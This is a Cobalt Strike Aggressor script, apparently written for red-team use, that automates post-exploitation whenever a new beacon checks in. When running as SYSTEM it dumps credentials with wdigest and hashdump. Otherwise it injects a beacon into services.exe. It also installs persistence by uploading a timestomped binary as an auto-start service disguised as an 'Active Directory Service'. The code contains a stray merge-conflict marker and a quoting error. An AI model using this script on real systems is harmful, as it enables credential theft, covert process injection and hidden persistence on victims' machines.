#################################################
# Created by @jgaudard  :: I don't twitter much
# Aggressor script for initial_beacon with cobaltstrike
# Created: 29 Sept 2016 Modified: 11 Jan 2017
# Version 1.0
#################################################

sub getanypid {
  bps($1, lambda({
    local('$pid $name $entry');
    foreach $entry (split("\n", $2)) {
      ($name, $ppid, $pid) = split("\\s+", $entry);
      if ($name eq $proc) {
        # $1 is our Beacon ID, $pid is the PID of $proc
        [$callback: $1, $proc, $pid];
      }
    }
  }, $proc => $2, $callback => $3));
}


on beacon_initial {
    $listener = "local - 443"'
    if("SYSTEM" isin beacon_info($1, "user")) {
      bwdigest($1);
      bhashdump($1);
      blog2($1, "I should setup some persistence...");
    }
    else {
      say("just a regular user, hopefully elevation works");

### assuming it is x64 for now
      getanypid($1, "services.exe", {
        binject($1, $3, $listener, "x64");
      });
    }


      bsleep($1, 300, 30);
      bnote($1, "Sleeping - 300 30%");
    }
=======
sub persist {
    if (-exists script_resource("adsvc.exe")) {
        binput($1, "service persistence (server) [AD]");
        bcd($1, 'c:\windows\system32');
        bupload($1, script_resource("adsvc.exe"));
        btimestomp($1, "adsvc.exe", "cmd.exe");
        bshell($1, 'sc delete adsvc');
        bshell($1, 'sc create adsvc binPath= "C:\windows\system32\adsvc.exe" start= auto DisplayName= "Active Directory Service"');
        bshell($1, 'sc description adsvc "Provides authentication and policy management for computers joined to domain."');
        bshell($1, 'sc start adsvc');

    }
    else {
        berror($1, "adsvc.exe does not exist");
    }
};


alias persist {
    if (-exists script_resource("adsvc.exe")) {
        binput($1, "service persistence (server) [AD]");
        bcd($1, 'c:\windows\system32');
        bupload($1, script_resource("adsvc.exe"));
        btimestomp($1, "adsvc.exe", "cmd.exe");
        bshell($1, 'sc delete adsvc');
        bshell($1, 'sc create adsvc binPath= "C:\windows\system32\adsvc.exe" start= auto DisplayName= "Active Directory Service"');
        bshell($1, 'sc description adsvc "Provides authentication and policy management for computers joined to domain."');
        bshell($1, 'sc start adsvc');

    }
    else {
        berror($1, "adsvc.exe does not exist");
    }
};
